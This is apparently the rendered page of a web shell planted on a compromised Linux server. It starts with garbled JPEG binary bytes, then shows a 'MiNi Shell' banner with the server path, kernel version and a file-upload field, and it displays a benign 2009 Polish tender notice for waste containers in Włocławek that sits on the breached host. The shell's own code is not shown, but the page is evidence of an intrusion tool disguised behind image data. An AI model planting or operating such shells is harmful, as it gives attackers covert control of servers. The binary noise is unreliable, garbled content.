JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090828/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090828/142403-N-2009.html

<p class="kh_header"><b>Włocławek: Dostawa fabrycznie nowych pojemników na odpady dla PGK Saniko Sp. z o.o. we Włocławku</b><br>
<b>Numer ogłoszenia: 142403 - 2009; data zamieszczenia: 28.08.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Przedsiębiorstwo Gospodarki Komunalnej "Saniko" Sp. z o.o. , ul. Komunalna 4, 87-800 Włocławek, woj. kujawsko-pomorskie, tel. 054 4121805, faks 054 4121804.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.saniko.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa fabrycznie nowych pojemników na odpady dla PGK Saniko Sp. z o.o. we Włocławku.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa fabrycznie nowych pojemników na odpady w rozbiciu na 2 zadania:

Zadanie Nr I
Dostawa pojemników z tworzywa sztucznego typu:
a)	pojemniki 60 l	-   100 szt.
b)	pojemniki 120 l	-   300 szt.
c)	pojemniki 240 l	-   300 szt.
d)	pojemniki 240 l na bio	-   100 szt.
e)	pojemniki 1100 l 	-   250 szt.

Zadanie Nr II
Dostawa pojemników stalowych typu:
a)	pojemniki 110 l 	-  2500 szt.
b)	pojemniki 1100 l	-    150 szt.
c)	pojemniki typu dzwon 1,1 m3 na gruz	-      30 szt.
d)	kontenery KP-8 odkryty	-      10 szt.
e)	prasokontener 20 m3	-        1 szt.
f)	pojemniki siatkowe typu dzwon 2,5 m3 na plastik	-      80 szt.
g)	pojemniki typu dzwon 1,5 m3 na szkło	-      30 szt.
h)	kosze przystankowe	-    100 szt..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 34.92.84.80-6.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wymagane wadium w podziale na zadania wynosi:
Zadanie Nr I - 2.000,00 PLN
Zadanie nr II - 6.000,00 PLN<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. O udzielenie zamówienia publicznego mogą ubiegać się Wykonawcy, którzy spełniają następujące warunki:
a)	posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
b)	posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia;
c)	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
d)	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia.
2.	Wymagania szczegółowe:
2.1.	Wykonawca winien zapewnić dostawę pojemników/kontenerów dopuszczonych do stosowania na terenie kraju. W celu potwierdzenia wymagania Wykonawca winien przedstawić:
a).	dla Zadania nr I - Certyfikat zgodności z normą PN-EN 840 i Certyfikat zgodności z normą jakościową RAL-GZ 951/1 oraz atest higieniczny Państwowego Zakładu Higieny dla pojemników wyszczególnionych w Zadaniu nr I.
b)	dla Zadania nr II - Deklaracje Zgodności z Dyrektywą Unii Europejskiej i Polskimi Normami dla pojemników/kontenerów wyszczególnionych w Zadaniu nr II pkt. od a) do g).
2.2.	Wykonawca winien zapewnić dostawę pojemników/kontenerów spełniających parametry techniczne określone w opisie przedmiotu zamówienia w rozdz. II SIWZ. W celu potwierdzenia spełnienia wymogu Wykonawca dostarczy wraz z ofertą wzory pojemników/kontenerów wyszczególnionych w opisie przedmiotu zamówienia w rozdz. II SIWZ. Dostarczone wzory pojemników/kontenerów winny być zgodne z parametrami technicznymi określonymi w opisie przedmiotu zamówienia rozdz. II SIWZ i wykonane zgodnie z wytycznymi określonymi w rozdz. III pkt. 2 SIWZ.
2.3.	Wykonawca winien posiadać doświadczenie w zakresie realizacji dostaw będących przedmiotem niniejszego postępowania i udokumentuje wykonanie minimum 5 dostaw o wartości, zakresie i charakterze podobnym do przedmiotu zamówienia. Zamawiający wymaga, aby fakt należytego wykonania ww. dostaw został potwierdzony odpowiednimi dokumentami.
2.4.	Wykonawca winien posiadać polisę ubezpieczeniową lub inny dokument ubezpieczenia potwierdzający, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej, minimum na kwotę odpowiadającą wartości oferowanej ceny brutto wykonywanego zadania.
2.5.	Wykonawca winien znajdować się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia. Wykonawca winien udokumentować posiadanie środków własnych lub zdolność kredytową, minimum na kwotę odpowiadającą wartości ofertowej ceny brutto wykonywanego zadania poprzez przedstawienie informacji z banku.
3. O udzielenie zamówienia mogą ubiegać się Wykonawcy nie podlegający wykluczeniu na podstawie art. 24 ust. 1 i 2 Ustawy Prawo Zamówień Publicznych, którzy złożą ofertę nie podlegającą odrzuceniu.

Zamawiający oceni spełnienie w/w warunków w oparciu o informacje zawarte w dokumentach i oświadczeniach załączonych do oferty. Ocena spełnienia w/w warunków dokonana zostanie zgodnie z formułą spełnia nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.	Oświadczenia w trybie art. art. 22 ust. 1 uPzp.
2.	Oświadczenie w trybie art. 24 ust 1 i 2 uPzp.
3.	Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej [wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert]. 
4.	Aktualna informacja z Krajowego Rejestru Karnego albo równoważne zaświadczenie właściwego organu sądowego lub administracyjnego kraju pochodzenia osoby w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, [wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert].
5.	Aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, [wystawionej nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert].
6.	Aktualne zaświadczenie właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzających odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne lub społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - [wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert]. 
7.	Wykaz wykonanych min 5 dostaw w okresie ostatnich trzech lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz załączenia dokumentów potwierdzających, że dostawy te zostały wykonane należycie zgodnie z warunkiem określonym w rozdz. IV. pkt 2 ppkt. 2.3. SIWZ. 
8.	Polisa lub inny dokument ubezpieczenia potwierdzającego, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej, minimum na kwotę odpowiadającą wartości oferowanej ceny brutto, zgodnie z warunkiem określonym  w rozdz. IV. pkt. 2 ppkt. 2.4. SIWZ.
9.	Informacja z banku, w którym Wykonawca posiada podstawowy rachunek bankowy, potwierdzająca wysokość posiadanych środków finansowych lub zdolność kredytową Wykonawcy na łączną kwotę nie mniejszą niż wartość oferowanej ceny brutto zgodnie z warunkiem określonym w rozdz. IV. pkt. 2 ppkt. 2.5. SIWZ, [wystawionej nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert].
10.	Certyfikat zgodności z normą PN-EN 840, Certyfikat RAL GZ 951/1 oraz atest higieniczny Państwowego Zakładu Higieny dla pojemników wyszczególnionych w Zadaniu nr I, zgodnie z warunkiem określonym w rozdz. IV. pkt. 2 ppkt. 2.1.a) SIWZ.
Deklaracje Zgodności pojemników/kontenerów z Dyrektywą Unii Europejskiej i Polskimi Normami dla pojemników/kontenerów wyszczególnionych w Zadaniu nr II w pkt. od a) do g), zgodnie z warunkiem określonym w rozdz. IV. pkt. 2 ppkt. 2.1.b) SIWZ.
11.	Pełnomocnictwa osób podpisujących ofertę do podejmowania zobowiązań w imieniu firmy składającej ofertę, o ile nie wynikają z innych ustaw lub dokumentów.
12.	Wzory pojemników/kontenerów wyszczególnionych w danym zadaniu wykonane zgodnie z wytycznym określonymi w rozdz. III pkt. 2 SIWZ, zgodnie z warunkiem określonym w rozdz. IV pkt. 2 ppkt. 2.2. SIWZ.
13.	Kopia dowodu wpłacenia wadium w formie pieniężnej..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1"><br>
<li>1 - Cena - 80</li>
<li>2 - Parametry techniczne - 20</li>
</ul><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://www.bip.saniko.com.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> ul. Komunalna 4, 87-800 Włocławek.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.09.2009 godzina 10:00, miejsce: w siedzibie Zamawiajacego przy ul. Komunalnej 4 we Włocławku.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa fabrycznie nowych pojemników na odpady z tworzywa sztucznego.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> a)	pojemniki 60 l	-   100 szt.
b)	pojemniki 120 l	-   300 szt.
c)	pojemniki 240 l	-   300 szt.
d)	pojemniki 240 l na bio	-   100 szt.
e)	pojemniki 1100 l 	-   250 szt..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 34.92.84.80-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Parametry techniczne - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa fabrycznie nowych pojemników stalowych na odpady.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> a)	pojemniki 110 l 	-  2500 szt.
b)	pojemniki 1100 l	-    150 szt.
c)	pojemniki typu dzwon 1,1 m3 na gruz	-      30 szt.
d)	kontenery KP-8 odkryty	-      10 szt.
e)	prasokontener 20 m3	-        1 szt.
f)	pojemniki siatkowe typu dzwon 2,5 m3 na plastik	-      80 szt.
g)	pojemniki typu dzwon 1,5 m3 na szkło	-      30 szt.
h)	kosze przystankowe	-    100 szt..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 34.92.84.80-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Parametry techniczne - 20</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com